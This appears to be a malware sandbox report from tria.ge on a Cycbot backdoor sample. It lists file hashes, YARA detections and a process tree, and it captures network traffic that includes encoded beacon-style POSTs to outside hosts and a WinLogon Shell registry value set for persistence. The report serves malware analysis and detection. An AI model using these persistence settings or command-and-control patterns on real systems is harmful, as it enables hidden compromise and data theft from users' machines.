Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
141s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
12/12/2024, 01:12 UTC
Static task
static1
Behavioral task
behavioral1
Sample
e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe
-
Size
202KB
-
MD5
e4078f024216d42ffb2cf93253d1e269
-
SHA1
388d33df212372db1baefe5dcd8a2952fbe2bfd5
-
SHA256
4011693ae2f420ea3775f4382304d5938a44cb3400bee4ee964decf2177d9755
-
SHA512
5e0b5ac29d8d6535cc355d24ca9ff30779e5d59321a02f180b62770e15429333e9296e90fd1184bede465b39b044c3d180dc34bbd899407d6557a5a828ab9a42
-
SSDEEP
3072:VbOCtDy04LH1tMYBhsYWc/iCah6R29Tjo4vEywZSQr6hlR9Zl2VMjdMYt8ssD3:pOUT4JngYWbCap9TjoohS3ejdPt8ss
Malware Config
Signatures
-
Cycbot family
-
Detects Cycbot payload 6 IoCs
Cycbot is a backdoor and trojan written in C++.
resource yara_rule behavioral1/memory/1736-8-0x0000000000400000-0x000000000048C000-memory.dmp family_cycbot behavioral1/memory/2308-16-0x0000000000400000-0x000000000048C000-memory.dmp family_cycbot behavioral1/memory/3012-78-0x0000000000400000-0x000000000048C000-memory.dmp family_cycbot behavioral1/memory/3012-77-0x0000000000400000-0x000000000048C000-memory.dmp family_cycbot behavioral1/memory/2308-79-0x0000000000400000-0x000000000048C000-memory.dmp family_cycbot behavioral1/memory/2308-183-0x0000000000400000-0x000000000048C000-memory.dmp family_cycbot -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\dwm.exe" e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/2308-2-0x0000000000400000-0x000000000048C000-memory.dmp upx behavioral1/memory/1736-6-0x0000000000400000-0x000000000048C000-memory.dmp upx behavioral1/memory/1736-8-0x0000000000400000-0x000000000048C000-memory.dmp upx behavioral1/memory/1736-5-0x0000000000400000-0x000000000048C000-memory.dmp upx behavioral1/memory/2308-16-0x0000000000400000-0x000000000048C000-memory.dmp upx behavioral1/memory/3012-78-0x0000000000400000-0x000000000048C000-memory.dmp upx behavioral1/memory/3012-77-0x0000000000400000-0x000000000048C000-memory.dmp upx behavioral1/memory/2308-79-0x0000000000400000-0x000000000048C000-memory.dmp upx behavioral1/memory/2308-183-0x0000000000400000-0x000000000048C000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2308 wrote to memory of 1736 2308 e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe 31 PID 2308 wrote to memory of 1736 2308 e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe 31 PID 2308 wrote to memory of 1736 2308 e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe 31 PID 2308 wrote to memory of 1736 2308 e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe 31 PID 2308 wrote to memory of 3012 2308 e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe 33 PID 2308 wrote to memory of 3012 2308 e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe 33 PID 2308 wrote to memory of 3012 2308 e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe 33 PID 2308 wrote to memory of 3012 2308 e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe"1⤵
- Modifies WinLogon for persistence
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Users\Admin\AppData\Local\Temp\e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe startC:\Users\Admin\AppData\Roaming\Microsoft\conhost.exe%C:\Users\Admin\AppData\Roaming\Microsoft2⤵
- System Location Discovery: System Language Discovery
PID:1736
-
-
C:\Users\Admin\AppData\Local\Temp\e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe startC:\Users\Admin\AppData\Local\Temp\csrss.exe%C:\Users\Admin\AppData\Local\Temp2⤵
- System Location Discovery: System Language Discovery
PID:3012
-
Network
-
Remote address:8.8.8.8:53Requestpsfk.comIN AResponsepsfk.comIN A35.158.87.123
-
GEThttp://psfk.com/img/icons/twitter.png?v52=74&tq=gHZutDyMv5rJfyG1J8K%2B1MWCJbP4lltXIA%3D%3De4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exeRemote address:35.158.87.123:80RequestGET /img/icons/twitter.png?v52=74&tq=gHZutDyMv5rJfyG1J8K%2B1MWCJbP4lltXIA%3D%3D HTTP/1.0
Connection: close
Host: psfk.com
Accept: */*
User-Agent: mozilla/2.0
ResponseHTTP/1.1 301 Moved Permanently
Content-Type: text/html
Content-Length: 175
Connection: close
Location: https://psfk.com/img/icons/twitter.png?v52=74&tq=gHZutDyMv5rJfyG1J8K%2B1MWCJbP4lltXIA%3D%3D
Server: my-server
-
Remote address:8.8.8.8:53Requestcofeeandteeshop.comIN AResponse
-
Remote address:8.8.8.8:53Requestzonetf.comIN AResponsezonetf.comIN A76.223.54.146zonetf.comIN A13.248.169.48
-
Remote address:8.8.8.8:53Requestzonetf.comIN AResponsezonetf.comIN A76.223.54.146zonetf.comIN A13.248.169.48
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3De4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exeRemote address:76.223.54.146:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3De4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exeRemote address:76.223.54.146:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3De4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exeRemote address:76.223.54.146:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqxSr%2Fe%2BV5ZuRg%3D%3De4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exeRemote address:76.223.54.146:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqxSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
Remote address:8.8.8.8:53Requestsmallautosite.comIN AResponse
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A172.217.20.164
-
Remote address:172.217.20.164:80RequestGET / HTTP/1.0
Connection: close
Host: www.google.com
Accept: */*
ResponseHTTP/1.0 302 Found
x-hallmonitor-challenge: CgwIocXrugYQu625iQESBLXXsFM
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-8fR7w7_qeillGxDTKZiiEQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Thu, 12 Dec 2024 13:18:25 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-WfnpaWMdUSFmBm8SsxjpKRycM4oQzLMfxRMsAe_Kw6iIPcRK_vc6o; expires=Tue, 10-Jun-2025 13:18:25 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
-
Remote address:8.8.8.8:53Requestsmallapplecompany.comIN AResponse
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5Ge4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exeRemote address:76.223.54.146:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5G HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
Remote address:172.217.20.164:80RequestGET / HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com
ResponseHTTP/1.1 302 Found
x-hallmonitor-challenge: CgwIocXrugYQw7K6_AISBLXXsFM
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-U3ZBwNB7H19_ObjbsS8jIA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Thu, 12 Dec 2024 13:18:25 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-Wbrv3_j8xTTn12wzfpCDRl_J3g827ZJ-DZktUK7WF_gvNUVsmJqQ; expires=Tue, 10-Jun-2025 13:18:25 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Connection: close
-
GEThttp://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGKHF67oGIjA4l3oq_H0BJksXsmPifL4-UX_t_HpDZ4wUTP8m6GJ2HBXnZTrjfNUJuKnXLNs236EyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMe4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exeRemote address:172.217.20.164:80RequestGET /sorry/index?continue=http://www.google.com/&q=EgS117BTGKHF67oGIjA4l3oq_H0BJksXsmPifL4-UX_t_HpDZ4wUTP8m6GJ2HBXnZTrjfNUJuKnXLNs236EyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com
ResponseHTTP/1.1 429 Too Many Requests
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3075
X-XSS-Protection: 0
Connection: close
-
35.158.87.123:80http://psfk.com/img/icons/twitter.png?v52=74&tq=gHZutDyMv5rJfyG1J8K%2B1MWCJbP4lltXIA%3D%3Dhttpe4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe579 B 685 B 9 6
HTTP Request
GET http://psfk.com/img/icons/twitter.png?v52=74&tq=gHZutDyMv5rJfyG1J8K%2B1MWCJbP4lltXIA%3D%3DHTTP Response
301 -
76.223.54.146:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3Dhttpe4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe579 B 245 B 5 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3DHTTP Response
405 -
76.223.54.146:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3Dhttpe4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe579 B 245 B 5 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3DHTTP Response
405 -
76.223.54.146:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3Dhttpe4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe561 B 245 B 5 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3DHTTP Response
405 -
76.223.54.146:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqxSr%2Fe%2BV5ZuRg%3D%3Dhttpe4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe631 B 245 B 6 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqxSr%2Fe%2BV5ZuRg%3D%3DHTTP Response
405 -
348 B 1.5kB 6 5
HTTP Request
GET http://www.google.com/HTTP Response
302 -
76.223.54.146:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5Ghttpe4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe619 B 245 B 6 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB5ClI7NrAWBGT7iirLZAYYfSJD90alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5GHTTP Response
405 -
307 B 1.5kB 5 5
HTTP Request
GET http://www.google.com/HTTP Response
302 -
172.217.20.164:80http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGKHF67oGIjA4l3oq_H0BJksXsmPifL4-UX_t_HpDZ4wUTP8m6GJ2HBXnZTrjfNUJuKnXLNs236EyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMhttpe4078f024216d42ffb2cf93253d1e269_JaffaCakes118.exe572 B 3.7kB 7 7
HTTP Request
GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGKHF67oGIjA4l3oq_H0BJksXsmPifL4-UX_t_HpDZ4wUTP8m6GJ2HBXnZTrjfNUJuKnXLNs236EyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMHTTP Response
429 -
-
-
54 B 70 B 1 1
DNS Request
psfk.com
DNS Response
35.158.87.123
-
65 B 138 B 1 1
DNS Request
cofeeandteeshop.com
-
56 B 88 B 1 1
DNS Request
zonetf.com
DNS Response
76.223.54.14613.248.169.48
-
56 B 88 B 1 1
DNS Request
zonetf.com
DNS Response
76.223.54.14613.248.169.48
-
63 B 136 B 1 1
DNS Request
smallautosite.com
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
172.217.20.164
-
67 B 140 B 1 1
DNS Request
smallapplecompany.com
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ac8ae23485802296d6cc37dd3eb2b8ff
SHA1509dbfb8af2760ee046d384bcf416c671b2aa696
SHA2568c1a365a2c1e8fcf7f60a35ae81aa78e6609f10295304fd97042567999137ffb
SHA512df4e02af8ec3eb2f8bf9f15304b7ee3468253518c45f6a5fe4bb865bbc6e5212c2a37bad7231e4ea2e7522f282f34b5d639be576c4cbbb43da26aa504c3d5b5e
-
Filesize
600B
MD5ecf6e556e5c85f895bcc3917e7315849
SHA14e143d5cd24d96f22c5a950bdadfa72d6a9baca1
SHA2560d0d721d67868d79c1a70c28ccc1f75a880278ee4eecc910a4fa72935b6277a9
SHA512d9443982a2f8b5724dc440c0699a5b36a24b941f7c71ceb831c81fd08440c760f05f3eda04dffc61a8691efe32238e1f45107b6c21a1bc3cf9aa7003dce341eb
-
Filesize
996B
MD569adc9694111500f939b69d094f5334f
SHA112d2ec5b6a0b9452489313880b1f928ca26f167b
SHA2566878b96a2503eb4bb408b57d2d7911bc0de2a206365dde47257dc613d75779b3
SHA5127d309504cb8fa48203afbcc6e3548bdb1e7ba81c03759b72d1c7d9d98fff2457f4dae5fbf4bdc9923191b34ed6d3982bca062da686fea7a5a82b26cef81579dc